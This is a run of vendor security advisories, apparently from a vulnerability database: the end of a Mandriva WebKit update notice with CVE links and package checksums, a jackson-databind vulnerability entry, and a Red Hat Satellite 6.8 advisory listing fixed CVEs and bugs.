http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0050
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0051
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0052
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0053
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0054
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0314
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0647
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0650
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0651
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0656
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1386
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1387
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1389
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1390
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1391
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1392
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1393
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1394
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1395
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1396
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1397
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1398
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1400
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1401
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1402
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1403
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1404
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1405
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1406
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1407
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1408
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1409
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1410
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1412
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1414
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1415
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1416
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1417
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1418
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1419
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1421
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1422
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1501
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1664
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1665
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1758
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1759
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1760
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1761
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1762
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1764
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1766
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1767
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1770
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1771
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1772
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1773
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1774
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1780
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1781
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1782
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1783
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1784
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1785
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1786
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1787
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1788
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1790
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1791
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1792
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1793
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1812
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1814
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1815
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2264
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2647
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2648
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3113
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3114
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3115
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3116
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3119
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3248
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3255
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3257
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3259
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3812
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3813
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4040
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4197
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4198
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4204
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4206
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2010.1:
141f3cd181b875d1bb40b67a507b6db1 2010.1/i586/libwebkitgtk1.0_2-1.2.7-0.1mdv2010.2.i586.rpm
054886a3c645b3ce710b9b9daec1d5f9 2010.1/i586/libwebkitgtk1.0-devel-1.2.7-0.1mdv2010.2.i586.rpm
bef556ca3f281f6ef4086292c3b658d2 2010.1/i586/webkit1.0-1.2.7-0.1mdv2010.2.i586.rpm
a1ff7ac638646aeb64e3bbdca9bc945d 2010.1/i586/webkit1.0-webinspector-1.2.7-0.1mdv2010.2.i586.rpm
3f40e3ebc62bad67097a9e102e0e79c2 2010.1/i586/webkit-1.2.7-0.1mdv2010.2.i586.rpm
50875cf1bc8718cedce1a45dc509b44b 2010.1/i586/webkit-gtklauncher-1.2.7-0.1mdv2010.2.i586.rpm
625d27780d1cc9edb935d4ac3521ae16 2010.1/i586/webkit-jsc-1.2.7-0.1mdv2010.2.i586.rpm
8d02c28d8f21a022130be4c49f9d27be 2010.1/SRPMS/webkit-1.2.7-0.1mdv2010.2.src.rpm
Mandriva Linux 2010.1/X86_64:
5ce57cd6ab823f8084030033c7c230d7 2010.1/x86_64/lib64webkitgtk1.0_2-1.2.7-0.1mdv2010.2.x86_64.rpm
690d8718a97af93f58de3bb2357fbe9b 2010.1/x86_64/lib64webkitgtk1.0-devel-1.2.7-0.1mdv2010.2.x86_64.rpm
7cc1d4aa77e1901ccc92f27faf85c9ea 2010.1/x86_64/webkit1.0-1.2.7-0.1mdv2010.2.x86_64.rpm
2b77a77159529c55f64343aba98c15d9 2010.1/x86_64/webkit1.0-webinspector-1.2.7-0.1mdv2010.2.x86_64.rpm
475cf83c5ddd8f6809c2c73a1f5a71d1 2010.1/x86_64/webkit-1.2.7-0.1mdv2010.2.x86_64.rpm
b0f1c76107c3d54241daa7e61bfb29a9 2010.1/x86_64/webkit-gtklauncher-1.2.7-0.1mdv2010.2.x86_64.rpm
97deff5e94a625a79842b4c240b0b00d 2010.1/x86_64/webkit-jsc-1.2.7-0.1mdv2010.2.x86_64.rpm
8d02c28d8f21a022130be4c49f9d27be 2010.1/SRPMS/webkit-1.2.7-0.1mdv2010.2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFNbgbemqjQ0CJFipgRAs9YAJ92z2WSC2ijj34b/wr42OIYLtv65gCg7XgL
Yv/ButpYAcXsmnJWUG4ayxQ=
=GRM6
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
|
var-202003-1784
|
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config). FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.10.4. An attacker could exploit this vulnerability with a specially crafted request to execute arbitrary code on the system. Description:
Red Hat Decision Manager is an open source decision management platform
that combines business rules management, complex event processing, Decision
Model & Notation (DMN) execution, and Business Optimizer for solving
planning problems. It automates business decisions and makes that logic
available to the entire business.
It is recommended to halt the server by stopping the JBoss Application
Server process before installing this update; after installing the update,
restart the server by starting the JBoss Application Server process. You must be logged in to download the update. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: Satellite 6.8 release
Advisory ID: RHSA-2020:4366-01
Product: Red Hat Satellite 6
Advisory URL: https://access.redhat.com/errata/RHSA-2020:4366
Issue date: 2020-10-27
CVE Names: CVE-2018-3258 CVE-2018-11751 CVE-2019-12781
CVE-2019-16782 CVE-2020-5216 CVE-2020-5217
CVE-2020-5267 CVE-2020-7238 CVE-2020-7663
CVE-2020-7942 CVE-2020-7943 CVE-2020-8161
CVE-2020-8184 CVE-2020-8840 CVE-2020-9546
CVE-2020-9547 CVE-2020-9548 CVE-2020-10693
CVE-2020-10968 CVE-2020-10969 CVE-2020-11619
CVE-2020-14061 CVE-2020-14062 CVE-2020-14195
CVE-2020-14334 CVE-2020-14380
====================================================================
1. Summary:
An update is now available for Red Hat Satellite 6.8 for RHEL 7.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Satellite 6.7 - noarch, x86_64
Red Hat Satellite Capsule 6.8 - noarch, x86_64
3. Description:
Red Hat Satellite is a systems management tool for Linux-based
infrastructure. It allows for provisioning, remote management, and
monitoring of multiple Linux deployments with a single centralized tool.
Security Fix(es):
* mysql-connector-java: Connector/J unspecified vulnerability (CPU October
2018) (CVE-2018-3258)
* netty: HTTP Request Smuggling due to Transfer-Encoding whitespace
mishandling (CVE-2020-7238)
* rubygem-websocket-extensions: ReDoS vulnerability in
Sec-WebSocket-Extensions parser (CVE-2020-7663)
* puppet: puppet server and puppetDB may leak sensitive information via
metrics API (CVE-2020-7943)
* jackson-databind: multiple serialization gadgets (CVE-2020-8840
CVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969
CVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195)
* foreman: unauthorized cache read on RPM-based installations through local
user (CVE-2020-14334)
* Satellite: Local user impersonation by Single sign-on (SSO) user leads to
account takeover (CVE-2020-14380)
* Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS
(CVE-2019-12781)
* rubygem-rack: hijack sessions by using timing attacks targeting the
session id (CVE-2019-16782)
* rubygem-secure_headers: limited header injection when using dynamic
overrides with user input (CVE-2020-5216)
* rubygem-secure_headers: directive injection when using dynamic overrides
with user input (CVE-2020-5217)
* rubygem-actionview: views that use the `j` or `escape_javascript` methods
are susceptible to XSS attacks (CVE-2020-5267)
* puppet: Arbitrary catalog retrieval (CVE-2020-7942)
* rubygem-rack: directory traversal in Rack::Directory (CVE-2020-8161)
* rubygem-rack: percent-encoded cookies can be used to overwrite existing
prefixed cookie names (CVE-2020-8184)
* hibernate-validator: Improper input validation in the interpolation of
constraint error messages (CVE-2020-10693)
* puppet-agent: Puppet Agent does not properly verify SSL connection when
downloading a CRL (CVE-2018-11751)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Additional Changes:
* Provides the Satellite Ansible Modules that allow for full automation of
your Satellite configuration and deployment.
* Adds ability to install Satellite and Capsules and manage hosts in a IPv6
network environment
* Ansible based Capsule Upgrade automation: Ability to centrally upgrade
all of your Capsule servers with a single job execution.
* Platform upgrades to Postgres 12, Ansible 2.9, Ruby on Rails and latest
version of Puppet
* Support for HTTP UEFI provisioning
* Support for CAC card authentication with Keycloak integration
* Add ability to upgrade Red Hat Enterprise Linux 7 hosts to version 8
using the LEAPP based tooling.
* Support for Red Hat Enterprise Linux Traces integration
* satellite-maintain & foreman-maintain are now self updating
* Notifications in the UI to warn users when subscriptions are expiring.
The items above are not a complete list of changes. This update also fixes
several bugs and adds various enhancements. Documentation for these changes
is available from the Release Notes document linked to in the References
section.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1160344 - [RFE] Satellite support for cname as alternate cname for satellite server
1261802 - [RFE] Make the foreman bootdisk full-host image work on UEFI systems
1300211 - capsule-certs-generate failed to increment release number when generating certificate rpm for foreman-proxy
1332702 - smart-proxy-openscap-send with additional features - alert if file corrupt
1398317 - For the vms built by Satellite 6 using "Network Based" installation mode on VMWare, unable to change the boot sequence via BIOS
1410616 - [RFE] Prominent notification of expiring subscriptions.
1410916 - Should only be able to add repositories you have access to
1429033 - Host provisioned with RHEL Workstation OS, after provisioning displayed as generic RedHat 7.3
1461781 - [RFE]A button should be available in the GUI to clear the recurring logics.
1469267 - need updated rubygem-rake
1486446 - Content view versions list has slow query for package count
1486696 - 'hammer host update' removes existing host parameters
1494180 - Sorting by network address for subnet doesn't work properly
1501499 - tomcat listens to 0.0.0.0 for serving requests but just needs localhost
1503037 - [RFE] Cancelled future/recurring job invocations should not get the status "failed" but rather "cancelled"
1505842 - Remote Execution engine: Error initializing command: Net::SSH::HostKeyMismatch - fingerprint 20:a9:b7:45:1a:b7:d6:42:1e:03:d1:1f:06:20:4c:e2 does not match for "172.17.0.101"
1531674 - Operating System Templates are ordered inconsistently in UI.
1537320 - [RFE] Support for Capsules at 1 version lower than Satellite
1543316 - Satellite 6.2 Upgrade Fails with error "rake aborted! NoMethodError: undefined method `first' for nil:NilClass" when there are custom bookmarks created
1563270 - Sync status information is lost after cleaning up old tasks related to sync.
1569324 - Webrick is unable to use 2 supported TLS v1.2 ciphers ('ECDHE-RSA-AES128-GCM-SHA256', 'ECDHE-RSA-AES256-GCM-SHA384')
1571907 - Passenger threads throwing tracebacks on API jobs after spawning
1576859 - [RFE] Implement automatic assigning subnets through data provided by facter
1584184 - [RFE] The locked template is getting overridden by default
1601101 - [RFE] Add autofill functionality to the Job invocation Search query box, copy from Hosts search box
1607706 - [RFE] Add support for --vlanid in Satellite Kickstart Default provisioning template
1608001 - Rearrange search/filter options on Red Hat Repositories page.
1613391 - race condition on removing multiple organizations simultaneously
1619274 - [RFE] Red Hat Satellite should now be able to discover and provision bare metal machines via UEFI HTTP boot
1619422 - User Agent for Downstream RSS feed still says Foreman and Foreman Version
1620214 - Page should auto-refresh after subscriptions have been modified on the Satellite webui
1624049 - Changing the organization in the Satellite WebUI does not change the sync plan page information from the previous organization
1625258 - Having empty "Allocation (GB)" when creating a new Host, nil:NilClass returned on creating the Host
1627066 - Unable to revert to the original version of the provisioning template
1630433 - [RFE] Include Ansible Satellite modules with Ansible Core modules
1630536 - yum repos password stored as cleartext
1632577 - Audit log show 'missing' for adding/removing repository to a CV
1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018)
1645062 - host_collection controller responds with 200 instead of 201 to a POST request
1645749 - repositories controller responds with 200 instead of 201 to a POST request
1647216 - Lack of edit_smart_proxies permission causes error when setting host to Build
1647364 - [RFE] Extend the audits by the http request id
1647781 - Audits contain no data (Added foo to Missing(ID: x))
1651297 - Very slow query when using facts on user roles as filters
1653217 - [RFE] More evocative name for Play Ansible Roles option?
1654347 - Satellite may create duplicate CreateRssNotifications tasks after restarting foreman tasks
1654375 - [RFE] Mention specifically uder the admin chexbox for AD LDAP user if its created with admin role,
1659418 - katello-tracer-upload failing with error "ImportError: No module named katello"
1665277 - subscription manager register activation key with special character failed
1665893 - candlepin refuses to start or hangs periodically when having too many messages in ActiveMQ journal
1666693 - Command "hammer subscription list" is not correctly showing the comment "Guests of " in the "Type" field in the output.
1677907 - Ansible API endpoints return 404
1680157 - [RFE] Puppet 'package' provider type does not support selecting modularity streams
1680458 - Locked Report Templates are getting removed.
1680567 - Reporting Engine API to list report template per organization/location returns 404 error
1681619 - [RFE] Disable the option to enter a MAC address after selecting a compute resource while creating new hosts through Satellite
1685949 - [RFE] Support passing of attribute name instead of Id's in RHV workflow
1687116 - kernel version checks should not use /lib/modules to determine running version
1688886 - subscription-manager not attaching the right quantity per the cpu core
1691416 - Delays when many clients upload tracer data simultaneously
1697476 - [RFE] To be able to see the name of the provisioning template being used to build a host from the host itself
1702434 - foreman-bootloaders-redhat-tftpboot expected file permissions in package don't match runtime permissions
1705097 - An empty report file doesn't show any headers
1709557 - [RFE] warn the user if they have done a select all and it includes the restart|reboot service
1709842 - Tracer shows the machines needs rebooting even after reboot if kernel-debug is installed
1710511 - Filter by os_minor includes unexpected values on the Satellite web UI.
1715999 - Use Infoblox API for DNS conflict check and not system resolver
1716423 - Nonexistent quota can be set
1717403 - Broken breadcrumbs link to compute resource VM list on VM detail page
1718012 - [RFE] Add a hard limit of 100 items to restrict any fact child-hash/array
1718954 - [RFE] When the contentAccessMode is set to org_environment for an owner, we should disable auto-attach globally
1719509 - [RFE] "hammer host list" including erratas information
1719516 - [RFE] "hammer host-collection hosts" including erratas information
1720725 - [RFE] Ability to override DHCP options and wait_after_restart option for race condition
1721419 - SSH key cannot be added when FIPS enabled
1722954 - Slow performance when running "hammer host list" with a high number of Content Hosts (15k+ for example)
1723313 - foreman_tasks:cleanup description contain inconsistent information
1724494 - [Capsule][smart_proxy_dynflow_core] "PID file /var/run/foreman-proxy/smart_proxy_dynflow_core.pid not readable (yet?) after start"
1724497 - CVE-2019-12781 Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS
1726768 - [RFE] Red Hat Satellite 6 GUI, Tasks should show Full name
1729968 - Editing disk size of a Compute Profile for a VMware Compute Resource makes the whole Storage section disappear
1730083 - [RFE] Add Jobs button to host detail page
1731155 - Cloud init template missing snippet compared to Kickstart default user data
1731229 - podman search against Red Hat Satellite 6 fails.
1731235 - [RFE] Create Report Template to list inactive hosts
1733241 - [RFE] hammer does not inherit parent location information
1733650 - Satellite receives RPM1004 pulp error and 403 Forbidden http error retrieving packages from CDN
1736809 - undefined method `split' for nil:NilClass when viewing the host info with hammer
1737135 - Content Hosts loses subscriptions after Vmotion and auto attach is unable to assigned the subscriptions if any other subscription is already attached to the host.
1737564 - [RFE] Support custom images on Azure
1738548 - Parameter --openscap-proxy-id is missing in hammer host create command.
1740943 - Increasing Ansible verbosity level does not increase the verbosity of output
1743056 - While creating a host for a particular location, all the domains are in the pull down list, even if only one domain is selected for that location.
1743776 - Error while deleting the content view version.
1745516 - Multiple duplicate index entries are present in candlepin database
1746936 - satellite6 is not using remote execution by default even after setting remote execution by default from satellite web-UI.
1749692 - Default Rhel8 scap content does not get populated on the Satellite
1749916 - [RFE] Satellite should support certificates with > 2048 Key size
1751981 - Parent object properties are not propagated to Child objects in Location and Host Group
1752880 - katello-host-tools-tracer stats paths abusively, leading to a hang or slowness of yum command
1753551 - Traces output from Satellite GUI has mismatches with client tracer output
1756991 - 2 inputs with same name -> uninitialized constant #<Class:0x000000000b894c38>::NonUniqueInputsError
1757317 - [RFE] Dynflow workers extraction
1757394 - [BUG] Non-admin users always get "Missing one of the required permissions" message while accessing their own table_preferences via Satellite 6 API
1759160 - Rake task for cleaning up DHCP records on proxy
1761872 - Disabled buttons are still working
1763178 - [RFE] Unnecessary call to userhelp and therefore log entries
1763816 - [RFE] Report which users access the API
1766613 - Fact search bar broken and resets to only searching hostname
1766906 - Associating more than 10 Ansible roles to a Host only sets based on the per-page setting
1767497 - Compute Resource filter does not correctly allow Refresh Cache
1767635 - [RFE] Enable Organization and Location to be entered not just selected
1770366 - [RFE] Improve upgrade efficiency by moving RPM post-installation scripts to the installer.
1770544 - Puppet run job notification do not populate "%{puppet_options}"' value
1770777 - Changing concurrency level while executing Ansible jobs fail with NoMethodError: undefined method `[]' for nil:NilClass
1771367 - undefined method `request_uri' when Openidc Provider Token Endpoint is none
1771428 - Openscap documentation link on Satellite 6 webui is broke
1771484 - Client side documentation links are not branded
1771693 - 'Deployed on' parameter is not listed in API output
1772381 - Incorrect example to use multiple attributes as a matcher key in the tooltip for Order
1772517 - login with the user name as same as existing user group gives 500 ISE and wont allow user to login again
1772544 - Use APIv4 is not the default when creating a new compute resource in ovirt
1773298 - GET /katello/api/srpms/compare always fails with error: Missing template katello/api/v2/common/compare
1774710 - UI: When selecting the server type in ldap authentication, "attribute mappings" fields could be populated automatically
1778396 - exporting/importing report template process is causing a different report during the visualization (blank lines)
1778503 - Prepended text on OS name creation
1778681 - Some pages are missing title in html head
1779638 - Unable to filter/search http-proxies using Organization/Location for Satellite UI.
1781671 - While using concurrency_level in remote execution, job progress in WebUI is not being updated properly
1782352 - [RHEL 8.1 client] All packages are not getting updated after click on "Update All Packages"
1782426 - Viewing errata from a repository returns incorrect unfiltered results
1783568 - [RFE] - Bulk Tracer Remediation
1783882 - Ldap refresh failed with "Validation failed: Adding would cause a cycle!"
1784012 - Default kickstart places log to /mnt/sysimage/root/install.post.log
1784341 - disable CertificateRevocationListTask job in candlepin.conf by default
1785117 - [RFE] Add functionality in foreman logging to hash-out or mark as [FILTERED] the password in /var/log/foreman-maintain/foreman-maintain.log and /var/log/foreman-installer/satellite.log file
1785231 - Ansible Variable override to false does not gets reflected on client machine on Red Hat Satellite 6.
1785624 - [UI] Importing templates with associate 'never' is not resulting as expected
1785683 - Does not load datacenter when multiple compute resources are created for same VCenter
1785902 - Ansible RunHostJob tasks failed with "Failed to initialize: NoMethodError - undefined method `[]' for nil:NilClass"
1785940 - [RFE] Reporting template should allow host filtering based on applicable errata issue date
1787329 - change filename in initrd live CPIO archive to fdi.iso
1788261 - CVE-2018-11751 puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL
1788958 - [RFE] add "elapsed time" column to export and hammer, make it filterable in WebUI
1789006 - Smart proxy dynflow core listens on 0.0.0.0
1789100 - CVE-2019-16782 rubygem-rack: hijack sessions by using timing attacks targeting the session id
1789434 - Template editor not always allows refreshing of the preview pane
1789522 - On unhealthy Satellite, dynflow_envelopes table might grow indefinitely
1789686 - Non-admin user with enough permissions can't generate report of applicable errata
1789815 - The "start" parameter should be mentioned inside "--compute-attributes:" in hammer_cli for Satellite 6
1789911 - "foreman-rake katello:publish_unpublished_repositories" is referring to column which no longer exists in katello_repositories table.
1789924 - [RFE] As user I want to see a "disabled" status for Simple Content Access (Golden Ticketed) Orgs
1791654 - drop config_templates api endpoints and parameters
1791656 - drop deprecated host status endpoint
1791658 - drop reports api endpoint
1791659 - Remove `use_puppet_default` api params
1791663 - remove deprecated permissions api parameters
1791665 - drop deprecated compute resource uuid parameter
1792131 - [UI] Could not specify organization/location for users that come from keycloak
1792135 - Not able to login again if session expired from keycloak
1792174 - [RFE] Subscription report template
1792304 - When generating custom report, leave output format field empty
1792378 - [RFE] Long role names are cut off in the roles UI
1793951 - [RFE] Display request UUID on audits page
1794015 - When using boot disk based provisioning, sometimes foreman tries to recreate folder foreman_isos in the datastore even when the folder already exists
1794346 - Change the label for the flashing eye icon during user impersonation
1794641 - Sync status page's content are not being displayed properly.
1795809 - HTML tags visible on paused task page
1796155 - [RFE] host_collections not available in reporting engine unless safe mode disabled
1796205 - iso upload: correctly check if upload directory exists
1796225 - CVE-2020-7238 netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling
1796259 - loading subscriptions page is very slow
1796697 - Unable to list/enable EUS repositories on the RHEL clients registered in the satellite server with org_environment contentAccessMode
1798489 - [RHSSO] - If Access Token Lifespan is set to 5 mins then the user is getting sign out instead after idle SSO timeout
1798668 - Configure default MongoDB WiredTiger cache to be 20% of RAM in the Satellite server
1799480 - CLI - hammer repository info shows blank sync status if the repository sync is in warning/error state.
1800503 - In Hammer, it is not possible to set default keyboard layout for a RHEV host
1801264 - CVE-2020-5217 rubygem-secure_headers: directive injection when using dynamic overrides with user input
1801286 - CVE-2020-5216 rubygem-secure_headers: limited header injection when using dynamic overrides with user input
1802529 - Repository sync in tasks page shows percentage in 17 decimal points
1802631 - Importing Ansible variables yields NoMethodError: undefined method `map' for nil:NilClass (initialize_variables) [variables_importer.rb]
1803846 - Red Hat Insights Risk Summary shows systems at risk while there are none
1804496 - While performing bulk actions, unable to select all tasks under Monitor --> Tasks page.
1804651 - Missing information about "Create Capsule" via webUI
1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages
1805727 - Default Custom Repository download policy setting refers to old name (Default Repository download policy) in satellite 6.7
1806713 - hypervisor checkin fails with cp_consumer_hypervisor_ukey error
1806842 - Disabling dynflow_enable_console from setting should hide "Dynflow console" in Tasks
1806897 - Red Hat Inventory Uploads fail with NoMethodError: undefined method `mtu'
1807042 - [RFE] Support additional disks for VM on Azure Compute Resource
1807321 - A non-admin users with view recurring_logics permissions are unable to list recurring logics.
1807829 - Generated inventory file doesn't exist
1807946 - Multiple duplicate index entries are present in foreman database
1808843 - Satellite lists unrelated RHV storage domains using v4 API
1810250 - Unable to delete repository - Content with ID could not be found
1810549 - dropping packets to qdrouterd triggers a memory leak in qpid-proton 0.28.0-2 libraries used by goferd
1810774 - Applying errata via Host Collection the errata are trying to be applied to all hosts associated with the host collection
1811390 - Links to an errata list of a repository lack repositoryId in URI and points to generic "errata" page instead
1812031 - Improve regenerate applicability tasks performance by querying NEVRA only data from repo_content_units
1812858 - Satellite Inventory Plugin does not appear to make reports which match yupana's API specification
1812904 - 'Hypervisors' task fails with 'undefined method `[]' for nil:NilClass' error
1813005 - Prevent --tuning option to be applied in Capsule servers
1813313 - [Tracker] Test HTTP UEFI on IPv6 (QA only tracker)
1814095 - Applicable errata not showing up for module stream errata
1815104 - Locked provisioning template should not be allowed to add audit comment
1815135 - hammer does not support description for custom repositories
1815146 - Backslash escapes when downloading a JSON-formatted report multiple times
1815608 - Content Hosts has Access to Content View from Different Organization
1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking
1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config
1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap
1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core
1816699 - Satellite Receptor Installer role can miss accounts under certain conditions
1816720 - CVE-2020-7942 puppet: Arbitrary catalog retrieval
1816853 - Report generated by Red Hat Inventory Uploads is empty.
1817215 - Admin must be able to provide all the client ids involved inside Satellite settings.
1817224 - Loading one org's content view when switching to a different org
1817481 - Plugin does not set page <title>
1817728 - Default task polling is too frequent at scale
1817874 - After data upload from satellite UI it is not visible on cloud.redhat.com.
1818062 - Deprecated message about katello agent being shown on content host registration page
1818816 - Web console should open in a new tab/window
1819145 - [RFE] Incorporate apipie-dsl to document template macros, provided as one-time generated HTML document
1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider
1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane
